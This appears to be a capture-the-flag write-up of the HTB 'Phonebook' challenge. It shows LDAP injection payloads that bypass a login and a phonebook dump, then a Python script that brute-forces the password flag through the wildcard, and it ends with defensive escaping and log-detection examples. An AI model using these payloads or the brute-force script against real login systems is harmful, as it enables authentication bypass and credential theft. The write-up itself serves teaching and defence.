Phonebook

When we see a login form on the website, the usual candidates are command injection, SQL injection, and LDAP injection.

The form asks us to log in with a workstation username. Workstation accounts are normally looked up in a directory, so LDAP injection is the most likely of the three.

This is a simple `LDAP injection` payload that we can use to check for the vulnerability. The `*` is a wildcard and `)(&` closes the current clause and opens a new, always-true one:

```
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

The response reported success, and a search box appeared after we clicked the button.

Typing a character into the search box returns matching phonebook entries. Searching for `flag` or `HTB` returns no results.

Searching for a single space returns the whole phonebook:

| Name | Email | Phone |
| --- | --- | --- |
| Kyle Reese | [email protected] | 555-1234567 |
| Ellery Hun | [email protected] | 317-959-9562 |
| Madelaine Lush | [email protected] | 636-918-1006 |
| Currey Conti | [email protected] | 529-673-3935 |
| Chaim Smoth | [email protected] | 895-974-4117 |
| Eldin Jelf | [email protected] | 363-426-3563 |
| Ganny Marti | [email protected] | 796-793-6925 |
| Jobey Olley | [email protected] | 607-345-0290 |
| Katalin Wilde | [email protected] | 414-839-2681 |
| Stinky Trood | [email protected] | 933-416-1003 |
| Tab Zoren | [email protected] | 360-678-3613 |
| Ursula Beer | [email protected] | 794-396-6882 |
| Bryan Arman | [email protected] | 640-255-8092 |
| Babette Cunio | [email protected] | 709-363-0223 |
| Berget Novis | [email protected] | 780-278-2572 |
| Ced Engley | [email protected] | 230-780-1999 |
| Caryn Germon | [email protected] | 967-789-6335 |
| Devina Alcide | [email protected] | 828-947-3484 |
| Dionne Lammas | [email protected] | 824-561-5676 |
| Emmalynn Burnup | [email protected] | 148-856-7052 |
| Fredericka Hanks | [email protected] | 762-337-5667 |
| Hannah Inder | [email protected] | 315-711-6454 |
| Jay Sharma | [email protected] | 893-382-5236 |
| Lilyan Crepel | [email protected] | 851-980-1038 |

...

Next we look up the user Reese, but the entry does not look like a flag:

```
output : Kyle Reese [email protected] 555-1234567
```

So we change the payload to test whether the password is the flag. Because `*` is a wildcard in an LDAP filter, `HTB*` matches any password that starts with `HTB`:

```
user=Reese
password=HTB*)(&
--> (&(user=Reese)(password=HTB*)(&))
```

The login succeeds, so Reese's password starts with `HTB`.

The password is the flag!
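The two payloads above (the `*)(&` bypass and the `HTB*` prefix test) both work because the application pastes raw input into the filter string. The following added example, which is not code from the writeup or from the challenge, reconstructs the filter template from the page's own `-->` lines (an assumption; the real application code is not available) and shows the defensive counterpart: escaping the values per RFC 4515 so that `*`, `(`, `)`, `\` and NUL can only ever match data, never act as syntax. The `contains_filter_metachars` check is an extra, assumed input-validation rule for login fields.

```python
# Added example (not part of the writeup): how the page's payloads alter the
# LDAP filter, and how RFC 4515 escaping keeps them inert.
# The template (&(user=...)(password=...)) is inferred from the page's "-->" lines.

LDAP_FILTER_SPECIALS = {"\\", "*", "(", ")", "\x00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value for use inside an LDAP search filter.

    RFC 4515 requires backslash, asterisk, parentheses and NUL to be written
    as a backslash followed by two hex digits. Everything else passes through.
    """
    return "".join(
        "\\%02x" % ord(ch) if ch in LDAP_FILTER_SPECIALS else ch
        for ch in value
    )


def vulnerable_filter(user: str, password: str) -> str:
    """String-concatenated filter: metacharacters in the input become syntax."""
    return f"(&(user={user})(password={password}))"


def safe_filter(user: str, password: str) -> str:
    """Same template, but the values are escaped so they can only match data."""
    return (
        f"(&(user={escape_filter_value(user)})"
        f"(password={escape_filter_value(password)}))"
    )


def contains_filter_metachars(value: str) -> bool:
    """Assumed input-validation rule: no legitimate username or password for
    this form needs LDAP filter syntax, so reject such input before it is used."""
    return any(ch in LDAP_FILTER_SPECIALS for ch in value)


if __name__ == "__main__":
    # The page's bypass: the injected "(&)" clauses are always true, so this
    # filter matches any entry that has both attributes.
    print(vulnerable_filter("*)(&", "*)(&"))
    # Same input escaped: now it only matches a password literally equal to "*)(&".
    print(safe_filter("*)(&", "*)(&"))
    # The prefix test from the page, raw and escaped.
    print(vulnerable_filter("Reese", "HTB*)(&"))
    print(safe_filter("Reese", "HTB*)(&"))
```

Note that `&` is not a filter metacharacter and is left alone; it is the unescaped `)` and `(` around it that let the payload start a new clause. Escaping fixes the root cause, while the metacharacter check is a cheap second line of defence that also gives you something to alert on.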

Brute force

We can recover the rest of the flag one character at a time with the same wildcard trick: a login with `HTB{x*` succeeds only if the password starts with `HTB{x`. The following Python script automates this:

```python
import requests
import string

URL = "~"  # placeholder: the challenge login URL is not given in the writeup

asciiLower = list(string.ascii_lowercase)

asciiUppercase = list(string.ascii_uppercase)

# Characters expected in the flag; "}" terminates it.
passwordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + ["_", "}"]

payload = "HTB{"
password = ""

done = False
while not done:
    for ch in passwordList:
        # "*" is an LDAP wildcard, so "HTB{x*" matches any password starting with "HTB{x"
        password = payload + ch + "*)(&"

        data = {"username": "Reese", "password": password}
        resp = requests.post(URL, data=data)

        if "success" in resp.text:
            payload += ch
            print(payload)
            if ch == "}":  # closing brace: the whole flag has been recovered
                done = True
            break  # move on to the next position
```

The flag has the form `HTB{d1rectory_******_**_****}`.
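From the defender's side, the brute force above has a telling property: every probe returns "success", so a detector that counts failed logins sees nothing. What does stand out is the volume, one `POST /login` per candidate character from a single source in quick succession. The following added example, which is not part of the writeup, runs a sliding-window count of login POSTs per source IP over a few constructed access-log lines (the log format, IPs, timestamps, endpoint name and threshold are all assumptions for illustration).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access-log lines (not from the challenge): 10.0.0.5 hammers
# the login endpoint once per second, 10.0.0.9 logs in once and then searches.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:01 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:02 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:03 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:03 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:04 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:05 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:06 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:14:10:00 +0000] "GET /search?q=Reese HTTP/1.1" 200 2048
"""

# Common Log Format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def find_login_bursts(log_text: str, path: str = "/login",
                      threshold: int = 5, window_seconds: int = 60) -> dict:
    """Return {ip: peak_count} for sources that sent at least `threshold`
    POSTs to `path` within any `window_seconds`-long window.

    Status codes are deliberately ignored: the wildcard oracle on this page
    makes every probe look like a successful login.
    """
    recent = defaultdict(deque)  # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        # Evict timestamps that have fallen out of the window.
        while (rec["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(window))
    return flagged


if __name__ == "__main__":
    for ip, count in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs within 60s")
```

The threshold and window are tuning knobs; for a phonebook login, a handful of attempts per minute from one address is already far above normal. Pairing this with the metacharacter check from the earlier example (alerting on `*`, `(` or `)` in a password field) catches the technique itself rather than just its volume.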